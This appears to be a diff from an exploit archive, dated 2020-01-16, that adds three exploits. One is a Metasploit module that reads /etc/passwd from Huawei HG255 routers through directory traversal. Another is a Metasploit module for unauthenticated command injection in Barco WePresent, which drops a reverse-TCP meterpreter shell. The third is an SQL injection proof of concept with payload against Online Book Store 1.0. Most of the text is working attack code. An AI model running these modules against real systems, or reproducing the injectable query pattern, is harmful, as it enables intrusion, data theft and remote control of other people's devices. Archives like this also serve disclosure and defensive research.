DB: 2020-01-16

3 changes to exploits/shellcodes

Barco WePresent - file_transfer.cgi Command Injection (Metasploit)
Online Book Store 1.0 -  'bookisbn' SQL Injection
Huawei HG255 - Directory Traversal ( Metasploit )

exploits/hardware/webapps/47923.rb

@@ -0,0 +1,57 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# web site for more information on licensing and terms of use.
+#
+##
+
+
+class MetasploitModule < Msf::Auxiliary
+   include Msf::Exploit::Remote::HttpClient
+
+   def initialize
+       super(
+           'Name'        => 'Huawei HG255 Directory Traversal',
+           ‘Description’ => ‘Server Directory Traversal at Huawei HG255 by malicious GET requests’,
+           ‘Author’      => ‘Ismail Tasdelen’,
+           ‘License’     => MSF_LICENSE,
+           ‘References’     =>
+           [
+              ['CVE', '2017-17309' ],
+              ['URL', 'https://www.huawei.com/en/psirt/security-notices/huawei-sn-20170911-01-hg255s-en']
+           ]
+       )
+       register_options(
+           [
+               Opt::RPORT(80)
+           ], self.class
+       )
+   end
+
+   def run
+       urllist=[
+           ‘/js/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd’,
+           ‘/lib/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd’,
+           ‘/res/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd’,
+           ‘/css/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd’]
+
+       urllist.each do |url|
+           begin
+               res = send_request_raw(
+               {
+                       ‘method’=> ‘GET’,
+                       ‘uri’=> url
+               })
+
+               if res
+                   print_good(“Vulnerable! for #{url}”)
+               else
+                   print_status(“Vulnerable(no response) detected for #{url}”)
+               end
+           rescue Errno::ECONNRESET
+               print_status(“Vulnerable(rst) detected for #{url}”)
+           rescue Exception
+               print_error(“Connection failed.”)
+           end
+       end
+   end

exploits/linux/remote/47924.rb

@@ -0,0 +1,105 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::CmdStager
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => "Barco WePresent file_transfer.cgi Command Injection",
+      'Description'    => %q(
+        This module exploits an unauthenticated remote command injection
+        vulnerability found in Barco WePresent and related OEM'ed products.
+        The vulnerability is triggered via an HTTP POST request to the
+        file_transfer.cgi endpoint.
+      ),
+      'License'        => MSF_LICENSE,
+      'Author'         => 'Jacob Baines', # @Junior_Baines'
+      'References'     =>
+        [
+          ['CVE', '2019-3929'],
+          ['EDB', '46786'],
+          ['URL', 'https://medium.com/tenable-techblog/eight-devices-one-exploit-f5fc28c70a7c']
+        ],
+      'DisclosureDate' => "Apr 30, 2019",
+      'Platform'       => ['unix', 'linux'],
+      'Arch'           => [ARCH_CMD, ARCH_ARMLE],
+      'Privileged'     => false,
+      'Targets'        => [
+        ['Unix In-Memory',
+         'Platform'    => 'unix',
+         'Arch'        => ARCH_CMD,
+         'Type'        => :unix_memory,
+         'Payload'     => {
+           'Compat' => { 'PayloadType' => 'cmd', 'RequiredCmd' => 'telnetd' }
+         }],
+        ['Linux Dropper',
+         'Platform'        => 'linux',
+         'Arch'            => ARCH_ARMLE,
+         'CmdStagerFlavor' => ['printf', 'wget'],
+         'Type'            => :linux_dropper]
+      ],
+      'DefaultTarget'  => 1,
+      'DefaultOptions' => {
+        'SSL'               => true,
+        'RPORT'             => 443,
+        'CMDSTAGER::FLAVOR' => 'printf',
+        'PAYLOAD'           => 'linux/armle/meterpreter/reverse_tcp'
+      }))
+  end
+
+  def filter_bad_chars(cmd)
+    cmd.gsub!(/;/, 'Pa_Note')
+    cmd.gsub!(/\+/, 'Pa_Add')
+    cmd.gsub!(/&/, 'Pa_Amp')
+    return cmd
+  end
+
+  def send_command(cmd, timeout)
+    vars_post = {
+      file_transfer: 'new',
+      dir: "'#{filter_bad_chars(cmd)}'"
+    }
+
+    send_request_cgi({
+      'uri'       => '/cgi-bin/file_transfer.cgi',
+      'method'    => 'POST',
+      'vars_post' => vars_post
+    }, timeout)
+  end
+
+  def check
+    check_resp = send_command(";whoami;", 5)
+    unless check_resp
+      return CheckCode::Unknown('Connection failed.')
+    end
+
+    if check_resp.code == 200
+      check_resp.body.gsub!(/[\r\n]/, "")
+      if check_resp.body == "root"
+        return CheckCode::Vulnerable
+      end
+    end
+
+    CheckCode::Safe
+  end
+
+  def execute_command(cmd, _opts = {})
+    send_command(";(#{cmd})&", nil)
+  end
+
+  def exploit
+    case target['Type']
+    when :unix_memory
+      execute_command(payload.encoded)
+    when :linux_dropper
+      execute_cmdstager(linemax: 128)
+    end
+  end
+end

exploits/php/webapps/47922.txt

@@ -0,0 +1,58 @@
+# Exploit Title: Online Book Store 1.0 -  'bookisbn' SQL Injection
+# Google Dork: N/A
+# Date: 2020-01-15
+# Exploit Author: AmirHadi Yazdani (Ertebat Gostar Co.)
+# Vendor Homepage: https://projectworlds.in/free-projects/php-projects/online-book-store-project-in-php/
+# Software Link: https://github.com/projectworlds32/online-book-store-project-in-php/archive/master.zip
+# Version: 1.0
+# Tested on: Ubuntu 16.04
+# CVE: N/A
+
+-------------- Vulnerable code in book.php ( Line 1-25) -----------------------------------------------
+  $book_isbn = $_GET['bookisbn']; // vulnerable param 
+  // connecto database
+  require_once "./functions/database_functions.php";
+  $conn = db_connect();
+
+  $query = "SELECT * FROM books WHERE book_isbn = '$book_isbn'"; // Injectable Point
+  $result = mysqli_query($conn, $query);
+  if(!$result){
+    echo "Can't retrieve data " . mysqli_error($conn);
+    exit;
+  }
+
+  $row = mysqli_fetch_assoc($result);
+  if(!$row){
+    echo "Empty book";
+    exit;
+  }
+
+  $title = $row['book_title'];
+  require "./template/header.php";
+?>
+      <!-- Example row of columns -->
+      <p class="lead" style="margin: 25px 0"><a href="books.php">Books</a> > <?php echo $row['book_title']; ?></p> // results goes here
+-------------------------------------------------------------------------------------------------------------------
+
+Exploit POC :
+
+# Parameter: bookisbn (GET)
+# Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
+# Vector: AND (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.TABLES GROUP BY x)a)
+
+#Payload: 
+http://site.com/book.php?bookisbn=123' AND (SELECT 9724 FROM(SELECT COUNT(*),CONCAT(0x716a7a7071,(SELECT (ELT(9724=9724,1))),0x71717a6b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.Tables GROUP BY x)a) AND 'aJYp'='aJYp
+
+-----------------------
+Other Vulnerable Pages with Same vulnerability  :
+
+[PAGE :bookPerPub.php], [PARAM : pubid ], [Method : GET], [Vulnerable Code : Line 6 & Line 16]
+
+[PAGE :edit_book.php], [PARAM : publisher ], [Method : POST], [Vulnerable Code : Line 13 & Line 27 & Line 31]
+
+[PAGE :checkout.php , Function : getBookByIsbn , Defined in database_functions.php], [PARAM : $isbn ], [Method : SESSION], [Vulnerable Code : Line 30 & Line 26 in database_functions.php]
+
+and other pages .... :)
+
+Also you can have more fun with Other XSS bugs too :)
+----

files_exploits.csv

@@ -17929,6 +17929,7 @@ id,file,description,date,author,type,platform,port
 47888,exploits/hardware/remote/47888.py,"EBBISLAND EBBSHAVE 6100-09-04-1441 - Remote Buffer Overflow",2020-01-08,hantwister,remote,hardware,
 47889,exploits/linux/remote/47889.txt,"ASTPP VoIP 4.0.1 - Remote Code Execution",2020-01-08,"Fabien AUNAY",remote,linux,
 47891,exploits/java/remote/47891.txt,"JetBrains TeamCity 2018.2.4 - Remote Code Execution",2020-01-08,hantwister,remote,java,
+47924,exploits/linux/remote/47924.rb,"Barco WePresent - file_transfer.cgi Command Injection (Metasploit)",2020-01-15,Metasploit,remote,linux,
 6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
@@ -42222,3 +42223,5 @@ id,file,description,date,author,type,platform,port
 47914,exploits/php/webapps/47914.txt,"Digi AnywhereUSB 14 - Reflective Cross-Site Scripting",2020-01-13,"Raspina Net Pars Group",webapps,php,
 47917,exploits/hardware/webapps/47917.txt,"IBM RICOH InfoPrint 6500 Printer - HTML Injection",2020-01-14,"Ismail Tasdelen",webapps,hardware,
 47918,exploits/hardware/webapps/47918.txt,"IBM RICOH 6400 Printer - HTML Injection",2020-01-14,"Ismail Tasdelen",webapps,hardware,
+47922,exploits/php/webapps/47922.txt,"Online Book Store 1.0 -  'bookisbn' SQL Injection",2020-01-15,"Sepahan TelCom IT Group",webapps,php,
+47923,exploits/hardware/webapps/47923.rb,"Huawei HG255 - Directory Traversal ( Metasploit )",2020-01-15,"Ismail Tasdelen",webapps,hardware,